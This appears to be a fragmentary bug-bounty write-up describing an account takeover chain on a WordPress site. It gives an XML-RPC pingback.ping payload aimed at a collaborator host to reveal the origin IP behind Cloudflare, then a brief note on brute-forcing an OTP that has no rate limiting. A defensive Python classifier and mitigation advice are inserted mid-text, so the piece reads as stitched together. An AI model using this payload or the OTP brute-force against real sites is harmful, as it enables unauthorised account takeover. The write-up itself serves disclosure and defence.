Tale of 3 vulnerabilities to account takeover!

https://github.com/projectdiscovery/subfinder
pingback.ping method allowed
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>[Burp collaborator link]</string></value>
</param>
<param>
<value><string>[Any valid blog post link]</string></value>
</param>
</params>
</methodCall>
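As an added example (not code from the original post), here is a small Python parser a defender could run over request bodies hitting xmlrpc.php to flag pingback.ping calls whose source URL points off-site, which is the shape of request that makes the origin server fetch an attacker-chosen URL. The sample bodies and the hostnames in them are constructed.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed request body modelled on the pingback.ping call above.
# (For untrusted input in production, parse with defusedxml instead.)
SAMPLE_PINGBACK = """<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://collab.attacker.example/x</string></value></param>
<param><value><string>https://blog.example/2020/01/post/</string></value></param>
</params>
</methodCall>"""

# Constructed harmless call for comparison.
SAMPLE_OTHER = """<?xml version="1.0" encoding="UTF-8"?>
<methodCall><methodName>demo.sayHello</methodName><params/></methodCall>"""


def parse_method_call(body: str):
    """Return (methodName, [string params]) from an XML-RPC methodCall body."""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    name = (root.findtext("methodName") or "").strip()
    params = [(s.text or "").strip()
              for s in root.iterfind("./params/param/value/string")]
    return name, params


def classify(body: str, own_hosts: set) -> str:
    """Verdict for one request body.

    'pingback-external-source': pingback.ping whose sourceURI (first param)
    is not one of our own hosts, i.e. the server would fetch a foreign URL.
    'pingback': pingback.ping between our own hosts.
    'other': any other method.
    """
    name, params = parse_method_call(body)
    if name != "pingback.ping":
        return "other"
    source_host = urlparse(params[0]).hostname if params else None
    if source_host and source_host not in own_hosts:
        return "pingback-external-source"
    return "pingback"
```

The usual fix is to disable the pingback.ping method (or XML-RPC entirely) rather than to rely on detection alone; the classifier is useful for confirming whether the endpoint is still reachable after that change.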
  1. Used the server's IP to bypass Cloudflare by directly reaching the origin server, and
  2. Brute-forced the OTP to take over the victim's account (as "rate limiting" wasn't set on the server side)

Avinash Jain (@logicbomb)